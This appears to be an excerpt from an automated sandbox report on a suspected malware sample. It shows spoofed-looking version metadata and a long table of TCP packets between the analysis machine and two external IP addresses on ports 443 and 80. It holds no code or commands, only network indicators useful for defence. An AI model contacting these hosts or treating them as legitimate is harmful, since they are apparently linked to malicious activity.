FileVersion	11.3.67.15
Copyright	Copyrighz (C) 2020, wodkaguds
ProductVersion	50.11.20.78
Translation	0x0274 0x0119

Possible Origin

Language of compilation system	Country where language is spoken	Map
Croatian	Croatia

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 11:27:59.329097033 CEST	49718	443	192.168.2.3	195.201.225.248
Jul 22, 2021 11:27:59.399204016 CEST	443	49718	195.201.225.248	192.168.2.3
Jul 22, 2021 11:27:59.399342060 CEST	49718	443	192.168.2.3	195.201.225.248
Jul 22, 2021 11:27:59.404484034 CEST	49718	443	192.168.2.3	195.201.225.248
Jul 22, 2021 11:27:59.472704887 CEST	443	49718	195.201.225.248	192.168.2.3
Jul 22, 2021 11:27:59.475827932 CEST	443	49718	195.201.225.248	192.168.2.3
Jul 22, 2021 11:27:59.475878000 CEST	443	49718	195.201.225.248	192.168.2.3
Jul 22, 2021 11:27:59.475908041 CEST	443	49718	195.201.225.248	192.168.2.3
Jul 22, 2021 11:27:59.475930929 CEST	443	49718	195.201.225.248	192.168.2.3
Jul 22, 2021 11:27:59.476121902 CEST	49718	443	192.168.2.3	195.201.225.248
Jul 22, 2021 11:27:59.484216928 CEST	49718	443	192.168.2.3	195.201.225.248
Jul 22, 2021 11:27:59.553503036 CEST	443	49718	195.201.225.248	192.168.2.3
Jul 22, 2021 11:27:59.599052906 CEST	49718	443	192.168.2.3	195.201.225.248
Jul 22, 2021 11:27:59.618459940 CEST	49718	443	192.168.2.3	195.201.225.248
Jul 22, 2021 11:27:59.724976063 CEST	443	49718	195.201.225.248	192.168.2.3
Jul 22, 2021 11:27:59.725033998 CEST	443	49718	195.201.225.248	192.168.2.3
Jul 22, 2021 11:27:59.725076914 CEST	443	49718	195.201.225.248	192.168.2.3
Jul 22, 2021 11:27:59.725116014 CEST	443	49718	195.201.225.248	192.168.2.3
Jul 22, 2021 11:27:59.725244999 CEST	49718	443	192.168.2.3	195.201.225.248
Jul 22, 2021 11:27:59.725492954 CEST	49718	443	192.168.2.3	195.201.225.248
Jul 22, 2021 11:27:59.744298935 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:27:59.861320019 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:27:59.861591101 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:27:59.862427950 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:27:59.862586021 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:27:59.941611052 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:27:59.941651106 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.254823923 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.266067982 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.346168995 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.648653984 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.648706913 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.648749113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.648782969 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.648822069 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.648864031 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.648902893 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.648904085 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.648945093 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.648979902 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.648991108 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.649028063 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.649033070 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.649127960 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.728779078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.728835106 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.728876114 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.728913069 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.728915930 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.728955030 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.728981972 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.729002953 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.729046106 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.729053974 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.729084015 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.729123116 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.729137897 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.729161978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.729198933 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.729212046 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.729235888 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.729274035 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.729286909 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.729320049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.729365110 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.729372978 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.729402065 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.729440928 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.729459047 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.729477882 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.729513884 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.729528904 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.729552984 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.729600906 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.811549902 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.811625004 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.811676979 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.811736107 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.811769962 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.811791897 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.811800003 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.811856985 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.811914921 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.811955929 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.811973095 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812030077 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.812031984 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812083960 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812120914 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812153101 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.812196970 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812237978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812252045 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.812293053 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812346935 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812351942 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.812401056 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812438965 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812455893 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.812495947 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812539101 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812546015 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.812589884 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812628984 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812644958 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.812683105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812732935 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.812735081 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812787056 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812824011 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812839985 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.812895060 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812936068 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812993050 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.812997103 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.813044071 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.813049078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.813098907 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.813138962 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.813152075 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.813200951 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.813241959 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.813258886 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.813297033 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.813343048 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.813349962 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.813395023 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.813431978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.813447952 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.813487053 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.813527107 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.813536882 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.813585043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.813643932 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.893115997 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893184900 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893229961 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893269062 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893277884 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.893307924 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893349886 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.893351078 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893413067 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.893414021 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893456936 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893496037 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893508911 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.893532991 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893579960 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893584967 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.893624067 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893661976 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893676996 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.893701077 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893740892 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893748045 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.893778086 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893809080 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893835068 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.893847942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893886089 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893901110 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.893924952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893960953 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.893974066 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.894000053 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894037008 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894048929 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.894083977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894125938 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894144058 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.894164085 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894201994 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894215107 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.894239902 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894275904 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894289970 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.894315004 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894354105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894367933 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.894401073 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894443035 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894448996 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.894480944 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894519091 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894525051 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.894556999 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894593000 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894599915 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.894630909 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894669056 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894675970 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.894715071 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894757032 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894761086 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.894795895 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894834042 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894844055 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.894871950 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894907951 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894922018 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.894946098 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.894984007 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.895032883 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.895036936 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.895085096 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.973992109 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.974044085 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.974082947 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.974123001 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.974212885 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.974329948 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.974342108 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.974381924 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.974474907 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.974513054 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.974550009 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.974560976 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.974586010 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.974594116 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.974632978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.974674940 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.974674940 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.974711895 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.974735022 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.974930048 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.974972010 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975012064 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975033045 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.975047112 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975086927 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975152016 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975193024 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975239038 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.975239992 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975254059 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.975282907 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975330114 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975358009 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.975377083 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975418091 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975418091 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.975455999 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975493908 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975497007 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.975531101 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975565910 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975570917 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.975603104 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975640059 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.975640059 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975684881 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.975687981 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975729942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975765944 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975795984 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.975804090 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975841999 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975877047 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975883961 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.975914001 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975945950 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.975950956 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.975999117 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.976003885 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.976042986 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.976079941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.976089001 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.976119041 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.976156950 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.976175070 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.976195097 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.976233006 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.976238966 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.976269960 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.976317883 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:00.976356030 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:00.976430893 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.053280115 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.053347111 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.053452015 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.053878069 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.053967953 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.054049015 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.054054976 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.054125071 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.054171085 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.054207087 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.054235935 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.054286957 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.054295063 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.054349899 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.054397106 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.054402113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.054455996 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.054503918 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.055397034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.055466890 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.055529118 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.055571079 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.055583000 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.055646896 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.055649042 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.055702925 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.055757999 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.055797100 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.055819988 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.055936098 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.055995941 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056066036 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056108952 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056149960 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056154013 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.056188107 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056205034 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.056226969 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056267977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056305885 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056309938 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.056345940 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056371927 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.056396008 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056440115 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056479931 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056514978 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.056519032 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056550980 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:01.056556940 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:01.056592941 CEST	80	49720	94.228.114.197	192.168.2.3
